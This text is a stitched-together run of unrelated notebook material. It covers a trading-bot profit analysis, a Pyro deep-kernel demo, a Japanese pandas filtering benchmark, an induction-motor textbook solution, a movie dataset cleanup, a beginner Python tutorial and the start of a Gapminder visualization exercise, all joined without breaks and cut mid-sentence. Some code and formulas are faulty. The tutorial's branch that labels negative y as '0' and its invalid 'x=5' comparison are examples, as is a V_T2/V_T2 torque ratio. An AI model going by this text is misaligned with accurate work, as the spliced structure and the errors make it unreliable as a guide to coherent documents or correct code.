compared to losses in losing days. The percentiles printed here confirms this: 50% of the time, the bot makes \\$10.25 or less during the winning days, and 50% of the time, the bot losses \\$28.375 or less during losing daysending_balance[ending_balance['Profit_Loss']<0]Looking at the losing days further, we indeed see that only four days made up the overwhelming amount of lossesSo there is a chance that in the future, some common factor could be found amongst those days to help the bot perform betterTraders typically seem to love volatility as they can play either side of the market and profit. Thus, let's next check if the price range of the stock on a particular day and standard deviation affected profit or lossesstock_data = pd.read_csv('StockData30Days.csv') #Calculate stock's max range and standard deviation for each day and append to ending balance dataframe ending_balance['MaxPriceRange'] = pd.Series() ending_balance['StandardDeviation'] = pd.Series() for date in stock_data['DateOnly'].unique(): #Obtain max range and standar deviation by slicing stock dataframe by dates one_date_data = stock_data.loc[stock_data['DateOnly'] == date,:] max_range = one_date_data['Close'].max() - one_date_data['Close'].min() std_dev = one_date_data['Close'].std() #Append max range and standard deviation to Ending Balance Dataframe ending_balance.loc[ending_balance['Date'] == date,'MaxPriceRange'] = max_range ending_balance.loc[ending_balance['Date'] == date,'StandardDeviation'] = std_dev ending_balance.head() plt.scatter(data = ending_balance, x = 'MaxPriceRange', y = 'Profit_Loss') plt.xlabel('Maximum Price Range in a Day') plt.ylabel('Profit/Loss') plt.title('Maximum Price Range vs. Profit/Loss in a Day') plt.scatter(data = ending_balance, x = 'StandardDeviation', y = 'Profit_Loss') plt.xlabel('Standard Deviation in Price in a Day') plt.ylabel('Profit/Loss') plt.title('Standard Deviation in Price vs. Profit/Loss in a Day')From the scatter plot, it does not seem that there is any relationship between profit to either maximum range or standard deviationending_balance[['Profit_Loss', 'MaxPriceRange', 'StandardDeviation']].corr()The correlation matrix further proves the lack of any strong relationship between Profit_Loss to either of MaxPriceRange and StandardDeviation; Profit_Loss and MaxPriceRange have a correlation of 0.092819, Profit_Loss and StandardDeviation have a correlation of 0.140759. This is not a surprise considering the trade algorithms in their core don't uitlize volatility at all.It makes sense that MaxPriceRange and StandardDeviation have a strong correlation as a higher max range would typically correspond to a higher standard deviation. 6.2 Analysis of All Executed Tradesall_trade_summary = pd.read_csv('AllTradeSummary30Days.csv') all_trade_summary.head() #Minor Cleanup #Unnamed:0 is the buy time index new_column_titles = list(all_trade_summary.columns) new_column_titles[0] = 'BuyTimeMinute' all_trade_summary.columns = new_column_titles all_trade_summary.head()Explanation of Columns- **BuyTimeMinute**: BuyTimeMinute indicates the Buy Time by calculating the difference between the buy time and starting time of the day (9:30 AM) in minutes. For example, 9:55 AM would have a BuyTimeMinute of 25. Encoding trade time this way helped to keep track of trade and could help in using machine learning algorithms in future versions of this bot.- **CurrentDay**: The day when the trade was executed- **TradeType**: Indicates the type of trade. The choices are either the base trade or far from moving average trade- **TradeStatus**: Indicates whether we went long on a stock or shorted the stock for a particular trade- **BuyPrice**: The price the shares were bought for shorting or going long- **LimitSellPrice**: The price at which the trading position was closed at if the trade was profitable- **StopLossPrice**: The price at which the trading position was closed at if the trade was unprofitable- **NumShares**: The number of shares for the specific trading position- **IsTradeComplete**: This column was used to keep track of active trade. It only contains "Yes" as all the trades were completed as per the constraints set on the bot- **SoldTime**: The time when the trading position was closed- **Profit**: Profit for the current trade We will first look at winning and losing trades on their ownWe will then look at winning and losing trade by TradeType, then by TradeStatusWe will finally look at whether the buy time for a trade affects the profitability of a trade or notnum_winning_trades = (all_trade_summary['Profit']>0).sum() num_losing_trades = (all_trade_summary['Profit']<0).sum() print('Total number of trades made are: {}'.format(all_trade_summary.shape[0])) print('Number of winning trades are: {}'.format(num_winning_trades)) print('Number of losing trades are: {}'.format(num_losing_trades)) #Creating labels for box and whisker plot all_trade_summary['Profit_Loss_Label'] = pd.Series() all_trade_summary.loc [all_trade_summary['Profit']>0, 'Profit_Loss_Label'] = 'Profit' all_trade_summary.loc [all_trade_summary['Profit']<0, 'Profit_Loss_Label'] = 'Loss' all_trade_summary.head() sb.boxplot(x = 'Profit_Loss_Label', y = 'Profit', data = all_trade_summary) plt.xlabel('Trade Classification') plt.ylabel('Profit/Loss') plt.title('Distribution of Profits and Losses by Trade') all_trade_summary.loc [all_trade_summary['Profit']>0, 'Profit'].describe() all_trade_summary.loc [all_trade_summary['Profit']<0, 'Profit'].describe() all_trade_summary['TradeType'].value_counts()It is not surprising that both winning and losing trade cluster around a similar area. As seen above, most of the trades were base trade, and in the implementation of the base trade algorithm, both stop loss and limit sell were set at $0.25 per share. The outliers for both losses and profit are likely to be from far from moving average tradeall_trade_summary[all_trade_summary['Profit'].abs()>15]And as shown here, the outliers in losses and gains (mostly losses) were all from far from moving average trade. As a natural next step, let's take a look at profit breakdown by TradeTypeall_trade_summary.groupby('TradeType').agg(np.sum)['Profit']Above, we have a summary of net profit by trade type. The base trade algorithm returned a profit of $12.50 while far from moving average trade algorithm lost a net \\$89.24As suspected, far from moving average algorithm caused more harm than good. Let's see next if shorting was more profitable or going long was more profitableall_trade_summary.groupby('TradeStatus').agg(np.sum)['Profit']In terms of going long on a stock or shorting a stock, it definitely seems more profitable to short a stockall_trade_summary.groupby(['TradeType','TradeStatus']).agg(np.sum)['Profit']The most profitable strategy seems to be only executing on short trade signals for base trade algorithm. If the bot only acted on this signal, then it would be reasonably profitable over 19 business days. It would return about 0.715% over a month, which annualizes to about 8.92% over a year. 8.92% annual return would beat most hedge funds. However, this data is only for over a month, so the comparison is not valid.Let's see if a particular buying time of the trade has any significant impact on profit or loss on tradessb.boxplot(x = 'Profit_Loss_Label', y = 'BuyTimeMinute', data = all_trade_summary) plt.xlabel('Trade Classification') plt.ylabel('Buy Time In Minutes Elapsed') plt.title('Distribution of Profits and Losses by Trade and Buy Time')Visually, we can see that buy time distribution of both winning and losing trades are roughly the same. So it is unlikely that the time of the day when a stock is bought affects the profit/loss on a a particular trade 6.3 Base Trade Summary Analysisbase_trade_summary = pd.read_csv('BaseTradeSummary30Days.csv', index_col = 0) far_moving_average_trade_summary = pd.read_csv('FarFromMovingAverageTradeSummary30Days.csv', index_col = 0) base_trade_summary.head()This DataFrame primary contains data of every 30-minute interval along with the stock's price range, the max/min stock's price during a 30-minute interval and their corresponding time, and so onStartTimeIndex and EndTimeIndex are the numbers of minutes passed since the market opened (9:30 AM). The difference between StarTimeIndex and EndTimeIndex is always 30 minutes because we are using each 30-minute block of time to check if the stock is in a base.The particular column of interest is TradeSignal and ExecutedOnSignalbase_trade_summary['TradeSignal'].unique()The TradeSignal column contains four values, as shown above- Nothing implies that the stock was not in a base during the 30-minute interval- Base means that the stock was in a base but did not break the base in the 31st minute- Long/Short implies that the stock was in a base and did break the base in the upward or downward directionbase_trade_summary['ExecutedOnSignal'].unique()The ExecutedOnSignal contains three values as shown above- Nothing implies that there was no base trading signal. Thus there was no question of the bot acting on a signal- Yes means that there was a base trade signal, and the bot acted on the signal- No implies that there was a base trade signal and the bot did not act on itSince it was established that base trade and shorting a stock is likely the most profitable trade, let's see how many of those signal, the bot did not act onbase_trade_summary['ExecutedOnSignal'].value_counts() #Bit of processing to show summarized data by ExecutedOnSignal and TradeSignal grouped_executed_tradeSignal = base_trade_summary.groupby(['ExecutedOnSignal', 'TradeSignal']).agg({'Date':'count'}) grouped_executed_tradeSignal.columns = ['count'] grouped_executed_tradeSignal.reset_index(inplace = True) grouped_executed_tradeSignalAbout equal number of trade signal was ignored by the bot for both long and short trade signalbase_trade_summary[base_trade_summary['ExecutedOnSignal'] == 'No']['EndTimeIndex'].max()Recall that the bot was constrained to not trade after 3:30 PM. 3:30 PM would correspond to a TimeIndex of 390 (implying 390 minutes passed since 9:30 AM). Since 383<390, no base trade signal was rejected due to time constraints on the bot. There were only four far from moving average trade executed over 19 days compared to 182 base trade. So active base trade and or maximum profit loss constraint likely caused the bot to ignore the trade signal. 6.4 Far From Moving Average Trade Summary Analysisfar_moving_average_trade_summary.head()This DataFrame contains a summary of result outputted by the bot for every minute the market was open from March 10, 2020, to April 3, 2020Only analysis for 9:30 AM is excluded as the far from moving average trade algorithm needs at least one previous minute of data to see if the stock price trend is breaking. I did not want to use the previous day's data at 4 PM as the last price as lots of trading happens after hours, which's data is not available from Yahoo Finance. Thus, using 9:30 AM data as the starting point of the trading algorithm made more sense.The indices here range from 1 to 389 for each day and then repeated for a new day. The row indices are Time Index or how many minutes have passed since 9:30 AM. The rest of the columns are self-explanatory based on the discussion so far, and thus not explained further.far_moving_average_trade_summary['ExecutedOnSignal'].unique()So bot executed on every trade signal generated by the far from moving average trade signalfar_moving_average_trade_summary.loc[far_moving_average_trade_summary['ExecutedOnSignal'] == 'Yes',:]Only four far from moving average trade was made in a month. The RSI threshold of 20 and 80 is not easily crossed without an exceptional market environment like in the first and second quarter of 2020; there was a panic selling followed by massive buying, resulting in a V-shaped recovery. Thus, the few numbers of far from moving average trade make sense.all_trade_summary[all_trade_summary['TradeType'] == 'FarFromMovingAverageTrade']Deep Kernel LearningWe now briefly discuss deep kernel learning. Quoting the [deep kernel learning paper](https://arxiv.org/abs/1511.02222): scalable deep kernels combine the structural properties of deep learning architectures with the non-parametric flexibility of kernel methods. We will transform our input via a neural network and feed the transformed input to our GP. To illustrate, we will create a simple step function dataset (heavily inspired from this [excellent writeup on tinyGP](https://tinygp.readthedocs.io/en/stable/tutorials/transforms.html)). We will be comparing our deep kernel with the RBF kernel.import torch import torch.nn as nn import torch.nn.functional as F import matplotlib.pyplot as plt import seaborn as sns from mpl_toolkits.axes_grid1 import make_axes_locatable import pyro.contrib.gp as gp import pyro torch.manual_seed(0) noise = 0.1 x = torch.sort(torch.distributions.Uniform(low=-1., high=1.).sample([100, 1]), 0)[0] x_squeeze = x.squeeze() y = 2 * (x_squeeze > 0) - 1 + torch.distributions.Normal(loc=0.0, scale=noise).sample([len(x)]) t =torch.linspace(-1.5, 1.5, 500) plt.plot(t, 2 * (t > 0) - 1, "k", lw=1, label="truth") plt.plot(x_squeeze, y, ".k", label="data") plt.xlim(-1.5, 1.5) plt.ylim(-1.3, 1.3) plt.xlabel("x") plt.ylabel("y") _ = plt.legend() class Net(nn.Module): def __init__(self): super().__init__() self.fc1 = nn.Linear(1, 5) self.fc2 = nn.Linear(5, 5) self.fc3 = nn.Linear(5, 2) def forward(self, x): x = F.relu(self.fc1(x)) x = F.relu(self.fc2(x)) x = self.fc3(x) return x pyro.clear_param_store() n = Net() # Using a separate lengthscale for each dimension rbf = gp.kernels.RBF(input_dim=2, lengthscale=torch.ones(2)) deep_kernel = gp.kernels.Warping(rbf, iwarping_fn=n) likelihood = gp.likelihoods.Gaussian() model_deep = gp.models.VariationalGP( X=x, y=y, kernel=deep_kernel, likelihood=likelihood, whiten=True, jitter=2e-3, ) model_rbf = gp.models.VariationalGP( X=x, y=y, kernel=gp.kernels.RBF(input_dim=1), likelihood=likelihood, whiten=True, jitter=2e-3, )As we can see, it is fairly straightforward to create a `deep` kernel by combining a regular kernel with a neural network. We can also confirm our `deep` kernel by printing it below. It should also be noted that unlike our earlier code, we explicitly specified lengthscale in our above example to be a vector of two values. This will allow our model to learn a different lengthscale for each dimension.deep_kernel losses_deep = gp.util.train(model_deep, num_steps=1000) losses_rbf = gp.util.train(model_rbf, num_steps=1000) plt.plot(losses_deep, label='Deep') plt.plot(losses_rbf, label='RBF') sns.despine() plt.legend() plt.xlabel("Iterations") plt.ylabel("Loss") with torch.no_grad(): fig, ax = plt.subplots(ncols=2, sharey=True, figsize=(9, 3)) for i, (model_name, model) in enumerate(zip(["Deep Kernel", "RBF"], [model_deep, model_rbf])): mean, var = model(x) ax[i].plot(x.squeeze(), mean, lw=4, color=f'C{i+1}', label=model_name) ax[i].fill_between(x_squeeze, mean-torch.sqrt(var), mean+torch.sqrt(var), alpha=0.3, color=f'C{i+1}') ax[i].scatter(x.squeeze(), y, color='k', alpha=0.7, s=25) ax[i].set_title(model_name) sns.despine() with torch.no_grad(): z = n(x) plt.plot(x.squeeze(), z, label='Transformed Input') plt.scatter(x.squeeze(), y, color='k', alpha=0.7, s=25, label='Data') plt.legend()Our deep kernel transform the data into a step function like data, thus, making it better suited in comparison to the RBF kernel, which has a hard time owing to the sudden jump around x=0.0.rbf.lengthscale3. 複数の値を条件にしてレコードを抽出したいゲーム内アイテム購入データから、特定の`user_id`を持つレコードを抽出したいとします。from itertools import product from matplotlib import pyplot as plt import numpy as np import pandas as pd from utilities.process_time import PandasProcessTimeMeasure plt.rcParams['font.size'] = 12 plt.rcParams['figure.figsize'] = (10, 6) item_data = pd.read_csv('./data/game_user_item.csv') item_data.head(5)このような場合、```pythonis_user1 = (item_data.user_id == 1)is_user2 = (item_data.user_id == 2)is_user3 = (item_data.user_id == 3)item_data.loc[is_user1 & is_user2 & is_user3, :]```とすると処理効率が1番良さそうです。 しかし、データ分析では特定の条件を満たすユーザーを抽出したい場合がほとんどなので、 このように少数が対象になることはなく、また、対象者数は変動するものなので、このコードは採用しづらいです。 そこでDataFrameに実装されている`isin`メソッドを使うと```pythontarget_user_id = [1, 2, 3]item_data.loc[item_data.user_id.isin(target_user_id), :]```となり、target_user_idを外部変数として与えることが簡単になるので、運用しやすいコードが書けます。 しかし、この`isin`メソッドはなぜか動作が遅く、1000万件のデータに対して使えないことが問題になります。 今回はこの場合について検証します。 方法1 isinメソッドを使った場合まずはベンチマークとして`isin`メソッドを使った方法です。 コードの記述が完結になるのが1番の魅力です。TEST_TARGET_USER_ID = [2855, 6635] def method1(data, user_id): _data = data.copy() is_target_user = _data.user_id.isin(user_id) result = _data.loc[is_target_user, :] return result method1(item_data.iloc[:100, :], TEST_TARGET_USER_ID).head()方法2 mapで対象アイテムにフラグを立てて抽出する次は`map`メソッドを使って抽出対象にフラグを立てて抽出する方法です。 `isin`メソッドの場合と同じような気がしますが、一応、検証してみます。def method2(data, user_id): _data = data.copy() is_target_user = _data.user_id.map(lambda i: i in user_id) result = _data.loc[is_target_user, :] return result method2(item_data.iloc[:100, :], TEST_TARGET_USER_ID).head()方法3 mergeを使って抽出対象にフラグを立てて抽出するdef method3(data, user_id): _data = data.copy() flag_table = pd.DataFrame( data={ 'user_id': user_id, 'is_target': [1] * len(user_id) } ) tmp = _data.merge( right=flag_table, on=['user_id'], how='left' ) result = tmp.loc[tmp.is_target == 1, :].copy() return result method3(item_data.iloc[:100,:], TEST_TARGET_USER_ID).head()検証結果 対象者数を10に限定して、方法1〜3を20000件までのデータで比較def generate_target_user_id_list(n): user_id_list = item_data.user_id.unique() return np.random.choice(user_id_list, size=n).tolist() TARGET_USER_ID = generate_target_user_id_list(10) process_time_measure = PandasProcessTimeMeasure( data=item_data, sample_sizes=[100, 500, 1000, 5000, 10000, 20000] ) process_time_measure.set_method(name='method01', method=lambda x: method1(x, TARGET_USER_ID)) process_time_measure.set_method(name='method02', method=lambda x: method2(x, TARGET_USER_ID)) process_time_measure.set_method(name='method03', method=lambda x: method3(x, TARGET_USER_ID)) process_time_measure.measure_process_time_for_each_sample_sizes() process_time_measure.plot_process_time() process_time_measure.process_time1000万件までのデータで方法1〜3を比較するTARGET_USER_ID = generate_target_user_id_list(10) process_time_measure = PandasProcessTimeMeasure( data=item_data, sample_sizes=[10000, 50000, 100000, 1000000, 10000000] ) process_time_measure.set_method(name='method01', method=lambda x: method1(x, TARGET_USER_ID)) process_time_measure.set_method(name='method02', method=lambda x: method2(x, TARGET_USER_ID)) process_time_measure.set_method(name='method03', method=lambda x: method3(x, TARGET_USER_ID)) process_time_measure.measure_process_time_for_each_sample_sizes() process_time_measure.plot_process_time() process_time_measure.process_time抽出対象ユーザー数を変化させて方法1〜3を検証TARGET_USER_ID = generate_target_user_id_list(100) process_time_measure = PandasProcessTimeMeasure( data=item_data, sample_sizes=[10000, 50000, 100000, 1000000, 10000000] ) process_time_measure.set_method(name='method01', method=lambda x: method1(x, TARGET_USER_ID)) process_time_measure.set_method(name='method02', method=lambda x: method2(x, TARGET_USER_ID)) process_time_measure.set_method(name='method03', method=lambda x: method3(x, TARGET_USER_ID)) process_time_measure.measure_process_time_for_each_sample_sizes() process_time_measure.plot_process_time() process_time_100 = process_time_measure.process_time.copy() user_num_index = pd.Series([100] * process_time_100.shape[0]) user_num_index.name = 'user_num' process_time_100.set_index(user_num_index, append=True, inplace=True) process_time_100`method2`は遅いので除外し、`method1`と`method3`のみを比較する。TARGET_USER_ID = generate_target_user_id_list(500) process_time_measure = PandasProcessTimeMeasure( data=item_data, sample_sizes=[10000, 50000, 100000, 1000000, 10000000] ) process_time_measure.set_method(name='method01', method=lambda x: method1(x, TARGET_USER_ID)) process_time_measure.set_method(name='method03', method=lambda x: method3(x, TARGET_USER_ID)) process_time_measure.measure_process_time_for_each_sample_sizes() process_time_measure.plot_process_time() TARGET_USER_ID = generate_target_user_id_list(1000) process_time_measure = PandasProcessTimeMeasure( data=item_data, sample_sizes=[10000, 50000, 100000, 1000000, 10000000] ) process_time_measure.set_method(name='method01', method=lambda x: method1(x, TARGET_USER_ID)) process_time_measure.set_method(name='method03', method=lambda x: method3(x, TARGET_USER_ID)) process_time_measure.measure_process_time_for_each_sample_sizes() process_time_measure.plot_process_time() TARGET_USER_ID = generate_target_user_id_list(5000) process_time_measure = PandasProcessTimeMeasure( data=item_data, sample_sizes=[10000, 50000, 100000, 1000000, 10000000] ) process_time_measure.set_method(name='method01', method=lambda x: method1(x, TARGET_USER_ID)) process_time_measure.set_method(name='method03', method=lambda x: method3(x, TARGET_USER_ID)) process_time_measure.measure_process_time_for_each_sample_sizes() process_time_measure.plot_process_time()Excercises Electric Machinery Fundamentals Chapter 6 Problem 6-26%pylab inlinePopulating the interactive namespace from numpy and matplotlibDescription A 460-V 50-hp six-pole $\Delta$ -connected 60-Hz three-phase induction motor has a full-load slip of 4 percent, an efficiency of 91 percent, and a power factor of 0.87 lagging. At start-up, the motor develops 1.75 times the full-load torque but draws 7 times the rated current at the rated voltage. This motor is to be started with an autotransformer reduced voltage starter. (a) * What should the output voltage of the starter circuit be to reduce the starting torque until it equals the rated torque of the motor? (b) * What will the motor starting current and the current drawn from the supply be at this voltage?Vt = 460 # [V] Wperhp = 746 # official conversion rate of "electrical horsepowers" Pout = 50 * Wperhp # [W] PF = 0.87 eta = 0.91 times_tor = 1.75 times_cur = 7SOLUTION (a)The starting torque of an induction motor is proportional to the square of $V_{TH}$ ,$$\frac{\tau_\text{start2}}{\tau_\text{start1}} = \left(\frac{V_\text{TH2}}{V_\text{TH1}}\right)^2 = \left(\frac{V_\text{T2}}{V_\text{T2}}\right)^2$$ If a torque of 1.75 $\tau_{rated}$ is produced by a voltage of 460 V, then a torque of 1.00 $\tau_\text{rated}$ would be produced by a voltage of:$$\frac{1.00\tau_\text{rated}}{1.75\tau_\text{rated}} = \left(\frac{V_{T2}}{460V}\right)^2$$Vt2 = sqrt(1.00/times_tor * Vt**2) print(''' Vt2 = {:.0f} V ==========='''.format(Vt2))Vt2 = 348 V ===========(b)The motor starting current is directly proportional to the starting voltage, so$$I_{L2} = \left(\frac{V_{T2}}{V_T}\right)I_{L1}$$Il2_Il1 = Vt2/Vt Il1_Irated = times_cur Il2_Irated = Il2_Il1 * Il1_Irated print(''' Il2 = {:.2f} Irated ================='''.format(Il2_Irated))Il2 = 5.29 Irated =================The input power to this motor is:$$P_\text{in} = \frac{P_\text{out}}{\eta}$$Pin = Pout / eta print('Pin = {:.1f} kW'.format(Pin/1000))Pin = 41.0 kWThe rated current is equal to:$$I_\text{rated} = \frac{P_\text{in}}{\sqrt{3}V_TPF}$$Irated = Pin / (sqrt(3)*Vt*PF) print('Irated = {:.2f} A'.format(Irated))Irated = 59.13 ATherefore, the motor starting current isIl2 = Il2_Irated * Irated print(''' Il2 = {:.1f} A ============='''.format(Il2))Il2 = 312.9 A =============The turns ratio of the autotransformer that produces this starting voltage is:$$\frac{N_{SE}+N_C}{N_C} = \frac{V_T}{V_{T2}} = a$$a = Vt/Vt2 print('a = {:.3f}'.format(a))a = 1.323so the current drawn from the supply will be:$$I_\text{line} = \frac{I_\text{start}}{a}$$Iline = Il2 / a print(''' Iline = {:.0f} A ============='''.format(Iline))Iline = 237 A =============Filtering Datasetimport pandas as pd import csv**Reading dataset without Box Office**movie = pd.read_csv('dataset02.csv') movie.head(3)**Filtering data with YEAR range 1990-2014 and COUNTRY as USA and LANGUAGE as English**filteringDataset = movie[(movie.YEAR >= 1990) & (movie.YEAR <= 2014) & (movie.COUNTRY.str.contains('USA') & (movie.LANGUAGE.str.contains('English')))]** Creating a dataframe and checking for multiple IMDB ID's **datasetDataframe = pd.DataFrame(filteringDataset) datasetDataframe['IMDB ID'].value_counts()[0:3]** One IMDB ID multiple entry found 'tt2279864' **datasetDataframe[datasetDataframe['IMDB ID'] == 'tt2279864']** Getting the correct row of IMDB ID 'tt2279864' **idtt2279864 = datasetDataframe.loc[25630]** Dataframe without IMDB ID 'tt2279864' **without_tt2279864 = datasetDataframe[datasetDataframe['IMDB ID'] != 'tt2279864']** Appending the single entry of IMDB ID 'tt2279864' to Dataframe without IMDB ID 'tt2279864' **finalDataset = without_tt2279864.append(idtt2279864, ignore_index=True)** No multiple entries of IMDB ID found **finalDataset['IMDB ID'].value_counts()[0:3]** Converting Dataframe to csv **finalDataset.to_csv('datasetWithoutBoxOffice.csv', index=False)[![AnalyticsDojo](https://github.com/rpi-techfundamentals/spring2019-materials/blob/master/fig/final-logo.png?raw=1)](http://introml.analyticsdojo.com)Introduction to Python - Conditional Statements and Loopsintroml.analyticsdojo.com Conditional Statements and Loops- (Need to know) Indentation in Python- What are conditional statements? Why do we need them?- If statements in Python- Why, Why not Loops?- Loops in Python- Exercises [Tabs vs Spaces](https://www.youtube.com/watch?v=SsoOG6ZeyUI)(Worth Watching) Indentation in Python- Indentation has a very specific role in Python and is **important!**- It is used as alternative to parenthesis, and getting it wrong will cause errors. - Python 3 allows 4 spaces or tabs, but not both. [But in working in Jupyter seems to work fine.]- In Python, spaces are preferred according to the [PEP 8 style guide](https://www.python.org/dev/peps/pep-0008/). What are conditional statements? Why do we need them? `if` Statements- Enables logical branching and recoding of data.- BUT, `if statements` can result in long code branches, repeated code.- Best to keep if statements short.- Keep in mind the [Zen of Python](https://www.python.org/dev/peps/pep-0020/) when writing if statements. Conditional Statements and Indentation- The syntax for control structures in Python use _colons_ and _indentation_.- Beware that indentation affects flow.- `if` statemenet enable logic. - `elif` give additional conditions.- `else` gives what to do if other conditions are not met.y = 5 x = 3 if x > 0: print ('x is strictly positive') print (x) print ('Finished.', x, y) x x = 1 y = 0 if x > 0: print ('x is greater than 0') if y > 0: print ('& y is also greater than 0') elif y<0: print ('& y is 0') else: print ('& y is equal 0') print ("x: ",x) print ('Finished.') x > 0 x != 5 or x=5 xPython Logit and Conditions- Less than <- Greater than >- Less than or equal ≤ <=- Greater than or equal >=- Equals ==- Not equal !=- `and` can be used to put multiple logical expressions together.- `or` can be used to put multiple logical expressions together.x = -1 y = 1 if x >= 0 and y >= 0: print ('x and y are greater than 0 or 0') elif x >= 0 or y >= 0: if x > 0: print ('x is greater than 0') else: print ('y is greater than 0') else: print ('neither x nor y greater than 0')y is greater than 0Python Conditionals (Alt Syntax) - Clean syntax doesn't get complex branching - Python ternary conditional operator `(falseValue, trueValue)[]`- Lambda Functions as if statement.x=0 z = 5 if x > 0 else 0 print(z) # This is a form of if statement called ternary conditional operator x=1 #The first value is the value if the conditional is false z=(0, 5)[x>0] print(z)5Why, Why Not Loops?- Iterate over arrays or lists easily. `for` or `while` loops can be nested.- BUT, in many cases for loops don't scale well and are slower than alternate methods involving functions. - BUT, don't worry about prematurely optimizing code.- Often if you are doing a loop, there is a function that is faster. You might not care for small data applications.- Keep in mind the [Zen of Python](https://www.python.org/dev/peps/pep-0020/id3) when writing `for` statements.#Here we are iterating on lists. sum=0 for ad in [1, 2, 3]: sum+=ad #This is short hand for sum = sum+ad print(sum) for country in ['England', 'Spain', 'India']: print(country) x=[0,1,2] y=['a','b','c'] #Nested for loops for a in x: for b in y: print(a,b)0 a 0 b 0 c 1 a 1 b 1 c 2 a 2 b 2 cThe `for` Loop- Can accept a `range(start, stop, step)` or `range(stop)` object- Can break out of it with a `break` commandz=range(5) z #Range is a built in function that can be passed to a for loop #https://docs.python.org/3/library/functions.html#func-range #Range accepts a number and a (start/stop/step) like the arrange command. z=range(5) print(z, type(z)) #Range for i in z: print('Printing ten') for i in range(5): print('Print five more') for i in range(5,20,2): print('i: %d is the value' % (i)) print(f'i:{i} is the value' ) #This is an alternate way of embedding values in text. #Sometimes you need to break out of a loop for x in range(3): print('x:',x) if x == 2: breakx: 0 x: 1 x: 2List, Set, and Dict Comprehension (Fancy for Loops)- Python has a special way of compressing list building to a single line. - Set Comprehension is very similar, but with the `{` bracket.- Can incorporate conditionals. - S#This is the long way of building lists. L = [] for n in range(10): L.append(n ** 2) L #With list comprehension. L=[n ** 2 for n in range(10)] L #Any actions are on left side, any conditionals on right side [i for i in range(20) if i % 3 == 0]Multiple Interators- Iterating on multiple values[(i, j) for i in range(2) for j in range(3)]Set Comprehension- Remember sets must have unique values.#We can change it to a setby just changing the brackets. {n**2 for n in range(6)}Dict Comprehension- Remember sets must have unique values.#We can change it to a dictionary by just changing the brackets and adding a colon. {n:n**2 for n in range(6)}While Loops- Performs a loop while a conditional is True.- Doesn't auto-increment.# While loop is a very interesting x = 1 sum=0 while x<10: print ("Printing x= %d sum= %d" % (x, sum)) #Note this alternate way of specufiy x += 1 sum+=10Printing x= 1 sum= 0 Printing x= 2 sum= 10 Printing x= 3 sum= 20 Printing x= 4 sum= 30 Printing x= 5 sum= 40 Printing x= 6 sum= 50 Printing x= 7 sum= 60 Printing x= 8 sum= 70 Printing x= 9 sum= 80Recoding Variables/Creating Features with `for/if`- Often we want to recode data applying some type of conditional statement to each value of a series, list, or column of a data frame.- [Regular Expressions](https://docs.python.org/3/howto/regex.html) can be useful in recoding#Titanic Preview Women and Children first gender=['Female', 'Female','Female', 'Male', 'Male', 'Male' ] age=[75, 45, 15, 1, 45, 4 ] name = ['Ms. ', 'Mrs. ', '', 'Rev. ' ] survived=[] for i in range(len(gender)): #This is encoding a simple model that women survived. if gender[i]=='Female': survived.append('Survived') else: survived.append('Died') print(survived) #BUT, we won't typically be using this type of recoding, so we aren't going to do a lot of exercises on it.['Survived', 'Survived', 'Survived', 'Died', 'Died', 'Died']_Lambda School Data Science_ Sequence your narrativeToday we will create a sequence of visualizations inspired by ['s 200 Countries, 200 Years, 4 Minutes](https://www.youtube.com/watch?v=jbkSRLYSojo).Using this [data from Gapminder](https://github.com/open-numbers/ddf--gapminder--systema_globalis/):- [Income Per Person (GDP Per Capital, Inflation Adjusted) by Geo & Time](https://raw.githubusercontent.com/open-numbers/ddf--gapminder--systema_globalis/master/ddf--datapoints--income_per_person_gdppercapita_ppp_inflation_adjusted--by--geo--time.csv)- [Life Expectancy (in Years) by Geo & Time](https://raw.githubusercontent.com/open-numbers/ddf--gapminder--systema_globalis/master/ddf--datapoints--life_expectancy_years--by--geo--time.csv)- [Population Totals, by Geo & Time](https://raw.githubusercontent.com/open-numbers/ddf--gapminder--systema_globalis/master/ddf--datapoints--population_total--by--geo--time.csv)- [Entities](https://raw.githubusercontent.com/open-numbers/ddf--gapminder--systema_globalis/master/ddf--entities--geo--country.csv)- [Concepts](https://raw.githubusercontent.com/open-numbers/ddf--gapminder--systema_globalis/master/ddf--concepts.csv) Objectives- sequence multiple visualizations- combine qualitative anecdotes with quantitative aggregatesLinks- [’s TED talks](https://www.ted.com/speakers/hans_rosling)- [Spiralling global temperatures from 1850-2016](https://twitter.com/ed_hawkins/status/729753441459945474)- "[The Pudding](https://pudding.cool/) explains ideas debated in culture with visual essays."- [A Data Point Walks Into a Bar](https://lisacharlotterost.github.io/2016/12/27/datapoint-in-bar/): a thoughtful blog post about emotion and empathy in data storytelling Make a plan How to present the data?Variables --> Visual Encodings- Income --> x- Lifespan --> y- Region --> color- Population --> size- Year --> animation frame (alternative: small multiple)- Country --> annotationQualitative --> Verbal- Editorial / contextual explanation --> audio narration (alternative: text) How to structure the data?| Year | Country | Region | Income | Lifespan | Population ||------|---------|----------|--------|----------|------------|| 1818 | USA | Americas | | | || 1918 | USA | Americas | | | || 2018 | USA | Americas | | | || 1818 | China | Asia | | | || 1918 | China | Asia | | | || 2018 | China | Asia | | | | More imports%matplotlib inline import matplotlib.pyplot as plt import numpy as np import pandas as pdLoad & look at dataincome = pd.read_csv('https://raw.githubusercontent.com/open-numbers/ddf--gapminder--systema_globalis/master/ddf--datapoints--income_per_person_gdppercapita_ppp_inflation_adjusted--by--geo--time.csv') lifespan = pd.read_csv('https://raw.githubusercontent.com/open-numbers/ddf--gapminder--systema_globalis/master/ddf--datapoints--life_expectancy_years--by--geo--time.csv') population = pd.read_csv('https://raw.githubusercontent.com/open-numbers/ddf--gapminder--systema_globalis/master/ddf--datapoints--population_total--by--geo--time.csv') entities = pd.read_csv('https://raw.githubusercontent.com/open-numbers/ddf--gapminder--systema_globalis/master/ddf--entities--geo--country.csv') concepts = pd.read_csv('https://raw.githubusercontent.com/open-numbers/ddf--gapminder--systema_globalis/master/ddf--concepts.csv') income.shape, lifespan.shape, population.shape, entities.shape, concepts.shape income.head() lifespan.head() population.head() pd.options.display.max_columns = 500 entities.head() concepts.head()Merge data https://github.com/pandas-dev/pandas/blob/master/doc/cheatsheet/Pandas_Cheat_Sheet.pdf# merge income and lifespan csv files df = pd.merge(income, lifespan) df.shape df = pd.merge(df, population) df.shape entities_variables = ['country', 'name', 'world_6region'] entities = entities[entities_variables] print(entities.shape) entities.head() entities['world_6region'].value_counts() merged = pd.merge(df, entities, left_on='geo', right_on='country') print(merged.shape) df.head() merged = merged.drop(['geo', 'country'], axis='columns') merged.head() merged = merged.rename(columns = { 'time': 'year', 'income_per_person_gdppercapita_ppp_inflation_adjusted': 'income', 'life_expectancy_years': 'lifespan', 